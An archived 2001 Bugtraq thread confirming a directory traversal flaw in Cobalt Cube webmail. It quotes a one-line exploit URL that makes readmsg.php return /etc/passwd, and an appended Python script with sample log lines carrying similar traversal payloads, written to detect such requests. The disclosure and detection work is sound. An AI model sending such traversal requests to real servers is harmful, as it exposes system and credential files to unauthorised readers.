Bugtraq mailing list archives
Re: Cobalt Cube Webmail directory traversal
From: John <johns () tampabay rr com>
Date: Tue, 10 Jul 2001 18:37:55 -0400
I confirmed this on Cobalt's, now Sun, Cube III.

Paul Marshall wrote:

At 08:41 05/07/2001, you wrote:

I just got a new Cobalt Cube today and I have been poking around at it for security issues... I noticed this minor issue in the webmail system. Your users are not allowed to have shell access by default; however, if they malform their mailbox requests they can read local files with the perms of the webserver. If your users have shell access they will not really be gaining anything; however, this could be used to remotely gather information for a future attack.

[admin admin]$ uname -a
Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
[admin admin]$ cat /etc/issue
Cobalt Linux release 6.0 (Carmel)
Kernel 2.2.16C7 on an i586

http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../
../../../../../../../../etc/passwd&id=1

-KF
--
The events which transpired five thousand years ago;
Five years ago or five minutes ago, have determined what will happen five minutes from now; five years
From now or five thousand years from now.
All history is a current event.
- Dr John Henrik Clake -
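
Added example, not part of the original posts: a log check an administrator could run to find requests like the one reported above, where the `mailbox` parameter of `readmsg.php` steps outside the mail directory. The log lines are constructed samples in combined-log style (an assumption about the server's log format), and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jul/2001:18:40:01 -0400] "GET /base/webmail/readmsg.php?mailbox=INBOX&id=1 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [10/Jul/2001:18:41:13 -0400] "GET /base/webmail/readmsg.php?mailbox=../../../../etc/passwd&id=1 HTTP/1.0" 200 812',
    '192.0.2.44 - - [10/Jul/2001:18:41:20 -0400] "GET /base/webmail/readmsg.php?mailbox=%2e%2e%2f%2e%2e%2fetc%2fissue&id=1 HTTP/1.0" 200 64',
    '198.51.100.7 - - [10/Jul/2001:18:45:02 -0400] "GET /base/webmail/readmsg.php?mailbox=/etc/issue&id=1 HTTP/1.0" 200 64',
    '192.0.2.10 - - [10/Jul/2001:18:46:30 -0400] "GET /base/webmail/readmsg.php?mailbox=Sent.Items&id=3 HTTP/1.0" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so encoded dots and slashes are visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(mailbox):
    """True if the mailbox name is absolute, has a '..' segment, or a NUL byte."""
    name = fully_decode(mailbox).replace("\\", "/")
    return name.startswith("/") or ".." in name.split("/") or "\x00" in name

def flag_requests(lines):
    """Return (client_ip, mailbox_value) for each suspicious readmsg.php request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/webmail/readmsg.php"):
            continue
        # parse_qs performs one round of percent-decoding on each value.
        for value in parse_qs(url.query, keep_blank_values=True).get("mailbox", []):
            if is_traversal(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for client, mailbox in flag_requests(SAMPLE_LOG):
        print(f"{client} requested mailbox={mailbox!r}")
```

A hit with a 200 status means the file contents were probably returned, so the follow-up is to list what else that client requested, not only to block it.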
Current thread:
- Cobalt Cube Webmail directory traversal KF (Jul 05)
- Re: Cobalt Cube Webmail directory traversal Paul Marshall (Jul 09)
- Re: Cobalt Cube Webmail directory traversal John (Jul 10)